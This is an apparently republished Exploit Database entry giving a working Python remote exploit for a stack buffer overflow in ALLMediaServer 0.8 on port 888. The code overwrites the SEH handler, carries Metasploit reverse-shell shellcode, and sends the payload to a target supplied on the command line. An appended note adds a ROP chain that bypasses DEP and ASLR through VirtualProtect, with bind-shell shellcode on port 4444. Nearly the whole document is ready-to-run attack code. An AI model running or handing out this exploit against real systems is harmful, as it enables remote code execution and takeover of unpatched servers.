ALLMediaServer 0.8 – Remote Overflow (SEH)

• Exploit Database
• 101 阅读

• 作者： motaz reda
  日期： 2012-07-06
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/19625/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144

  # Exploit Title: seh exploit, BOF # Date: 04/07/2012 # Exploit Author: motaz reda # my E-mail:motazkhodair@gmail.com # Software Link: http://allmediaserver.org/ # Version: ALLMediaServer 0.8 # Tested On: Windows 7 ultimate ################################################   #!/usr/bin/python   import sys, socket   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   s.connect((sys.argv[1], 888))   buffer = "A" * 1072   buffer += "\xeb\x06\x90\x90" #NSEHjmp short 6   buffer += "\xca\x24\xec\x65" # SEHPOP POP RETN   # msfpayload windows/shell_reverse_tcp # you can replace the shellcode with any shellcode u want   buffer += ("\xd9\xc8\xd9\x74\x24\xf4\xb8\xa6\xaa\xb6\xad\x5b\x2b\xc9\xb1" "\x4f\x83\xeb\xfc\x31\x43\x15\x03\x43\x15\x44\x5f\x4a\x45\x01" "\xa0\xb3\x96\x71\x28\x56\xa7\xa3\x4e\x12\x9a\x73\x04\x76\x17" "\xf8\x48\x63\xac\x8c\x44\x84\x05\x3a\xb3\xab\x96\x8b\x7b\x67" "\x54\x8a\x07\x7a\x89\x6c\x39\xb5\xdc\x6d\x7e\xa8\x2f\x3f\xd7" "\xa6\x82\xaf\x5c\xfa\x1e\xce\xb2\x70\x1e\xa8\xb7\x47\xeb\x02" "\xb9\x97\x44\x19\xf1\x0f\xee\x45\x22\x31\x23\x96\x1e\x78\x48" "\x6c\xd4\x7b\x98\xbd\x15\x4a\xe4\x11\x28\x62\xe9\x68\x6c\x45" "\x12\x1f\x86\xb5\xaf\x27\x5d\xc7\x6b\xa2\x40\x6f\xff\x14\xa1" "\x91\x2c\xc2\x22\x9d\x99\x81\x6d\x82\x1c\x46\x06\xbe\x95\x69" "\xc9\x36\xed\x4d\xcd\x13\xb5\xec\x54\xfe\x18\x11\x86\xa6\xc5" "\xb7\xcc\x45\x11\xc1\x8e\x01\xd6\xff\x30\xd2\x70\x88\x43\xe0" "\xdf\x22\xcc\x48\x97\xec\x0b\xae\x82\x48\x83\x51\x2d\xa8\x8d" "\x95\x79\xf8\xa5\x3c\x02\x93\x35\xc0\xd7\x33\x66\x6e\x88\xf3" "\xd6\xce\x78\x9b\x3c\xc1\xa7\xbb\x3e\x0b\xde\xfc\xa9\x74\x49" "\x03\x3e\x1d\x88\x03\x2f\x81\x05\xe5\x25\x29\x40\xbe\xd1\xd0" "\xc9\x34\x43\x1c\xc4\xdc\xe0\x8f\x83\x1c\x6e\xac\x1b\x4b\x27" "\x02\x52\x19\xd5\x3d\xcc\x3f\x24\xdb\x37\xfb\xf3\x18\xb9\x02" "\x71\x24\x9d\x14\x4f\xa5\x99\x40\x1f\xf0\x77\x3e\xd9\xaa\x39" "\xe8\xb3\x01\x90\x7c\x45\x6a\x23\xfa\x4a\xa7\xd5\xe2\xfb\x1e" "\xa0\x1d\x33\xf7\x24\x66\x29\x67\xca\xbd\xe9\x97\x81\x9f\x58" "\x30\x4c\x4a\xd9\x5d\x6f\xa1\x1e\x58\xec\x43\xdf\x9f\xec\x26" "\xda\xe4\xaa\xdb\x96\x75\x5f\xdb\x05\x75\x4a")   s.send(buffer)   s.close()   ### Exploit-DB note: ### This affects AllMediaSErver 0.94 as well.   # Exploit-DB Note: # Here's a ROP chain that will work on Windows 7 Pro Eng DEP AlwaysOn # DEP/ASLR bypass with bind shell on port 4444 buffer = "\x41" * 984 buffer+= "\xe6\x30\x46\x00" # Second ADD esp for stack adjustment # add esp,90 | pop esi | pop ebx | retn ~ MediaServer.exe buffer+= "\x41" * 88 # Step over SEH stackAdjust = "\x9e\x6c\x42\x00" # add esp,800 | pop ebx | retn ~ MediaServer.exe # Returns to Second ADD ESP stackAdjust+= "\x42\x42\x42\x42" * 15 # Padding   # VirtualProtect into ESI rop = "\x26\xfa\xf6\x65" # pop eax | retn ~ avcodec-53.dll rop+= "\xe0\xe4\x1e\x67" # &kernel32.VirtualProtect ~ rop+= "\x54\xcd\xc6\x6a" # mov eax,dword ptr ds:[eax] | retn ~ rop+= "\x04\xef\x2e\x66" # xchg eax,esi | retn ~ avcodec-53.dll # Puts Kernel31.VirtualProtect # lpAddress param into EBP rop+= "\xb3\x14\xb8\x68"# pop ebp | retn ~ rop+= "\x07\x5d\x0c\x66" # ROP jmp esp | ??? ~ avcodec-53.dll   # dwSize into EBX rop+= "\x26\xfa\xf6\x65"# pop eax | retn~ avcodec-53.dll rop+= "\xff\xfd\xff\xff" # Will negate to 0x201 rop+= "\xbe\x13\x6e\x66"# neg eax | retn rop+= "\x2b\xe2\xf4\x65" # xchg eax,ebx | retn ~ avcodec-53.dll   # flNewProtect 0x40 into EDX rop+= "\x26\xfa\xf6\x65"# pop eax | retn ~ avcodec-53.dll rop+= "\xc0\xff\xff\xff" # Will negate to 0x40 rop+= "\xbe\x13\x6e\x66"# neg eax | retn~ avcodec-53.dll rop+= "\x46\x08\x53\x66" # xchg eax,edx | retn ~ avcoded-53.dll   # lpflOldProtect into ECX rop+= "\x26\xfa\xf6\x65"# pop eax | retn ~ avcodec-53.dll rop+= "\x69\xef\x5f\x00" # writeable address ~ avformat-53.dll rop+= "\xeb\x9b\x74\x66" # xchg eax,ecx | retn ~ avcodec-53.dll   # RETN into EDI rop+= "\x84\xe6\x75\x66" # pop edi | retn rop+= "\x6d\x9b\xb2\x6a" # retn ROP   # Nops in EAX rop+= "\x26\xfa\xf6\x65"# pop eax | retn ~ avcodec-53.dll rop+= "\x90\x90\x90\x90"   # PushAD rop+= "\x3a\x18\x75\x66" # pushad | rent ~ avodec-53.dll   rop+= "\x90\x90\x90\x90"     shellcode =( "\xba\x4b\xdb\xfb\xca\xdb\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9" "\xb1\x56\x31\x55\x13\x03\x55\x13\x83\xed\xb7\x39\x0e\x36" "\xaf\x37\xf1\xc7\x2f\x28\x7b\x22\x1e\x7a\x1f\x26\x32\x4a" "\x6b\x6a\xbe\x21\x39\x9f\x35\x47\x96\x90\xfe\xe2\xc0\x9f" "\xff\xc2\xcc\x4c\xc3\x45\xb1\x8e\x17\xa6\x88\x40\x6a\xa7" "\xcd\xbd\x84\xf5\x86\xca\x36\xea\xa3\x8f\x8a\x0b\x64\x84" "\xb2\x73\x01\x5b\x46\xce\x08\x8c\xf6\x45\x42\x34\x7d\x01" "\x73\x45\x52\x51\x4f\x0c\xdf\xa2\x3b\x8f\x09\xfb\xc4\xa1" "\x75\x50\xfb\x0d\x78\xa8\x3b\xa9\x62\xdf\x37\xc9\x1f\xd8" "\x83\xb3\xfb\x6d\x16\x13\x88\xd6\xf2\xa5\x5d\x80\x71\xa9" "\x2a\xc6\xde\xae\xad\x0b\x55\xca\x26\xaa\xba\x5a\x7c\x89" "\x1e\x06\x27\xb0\x07\xe2\x86\xcd\x58\x4a\x77\x68\x12\x79" "\x6c\x0a\x79\x16\x41\x21\x82\xe6\xcd\x32\xf1\xd4\x52\xe9" "\x9d\x54\x1b\x37\x59\x9a\x36\x8f\xf5\x65\xb8\xf0\xdc\xa1" "\xec\xa0\x76\x03\x8c\x2a\x87\xac\x59\xfc\xd7\x02\x31\xbd" "\x87\xe2\xe1\x55\xc2\xec\xde\x46\xed\x26\x69\x41\x23\x12" "\x3a\x26\x46\xa4\xad\xea\xcf\x42\xa7\x02\x86\xdd\x5f\xe1" "\xfd\xd5\xf8\x1a\xd4\x49\x51\x8d\x60\x84\x65\xb2\x70\x82" "\xc6\x1f\xd8\x45\x9c\x73\xdd\x74\xa3\x59\x75\xfe\x9c\x0a" "\x0f\x6e\x6f\xaa\x10\xbb\x07\x4f\x82\x20\xd7\x06\xbf\xfe" "\x80\x4f\x71\xf7\x44\x62\x28\xa1\x7a\x7f\xac\x8a\x3e\xa4" "\x0d\x14\xbf\x29\x29\x32\xaf\xf7\xb2\x7e\x9b\xa7\xe4\x28" "\x75\x0e\x5f\x9b\x2f\xd8\x0c\x75\xa7\x9d\x7e\x46\xb1\xa1" "\xaa\x30\x5d\x13\x03\x05\x62\x9c\xc3\x81\x1b\xc0\x73\x6d" "\xf6\x40\x83\x24\x5a\xe0\x0c\xe1\x0f\xb0\x50\x12\xfa\xf7" "\x6c\x91\x0e\x88\x8a\x89\x7b\x8d\xd7\x0d\x90\xff\x48\xf8" "\x96\xac\x69\x29")   payload = buffer + stackAdjust + rop + shellcode rest = 1765 - len(payload) exploit = payload + "\xCC" * rest # Send exploit to target's port 888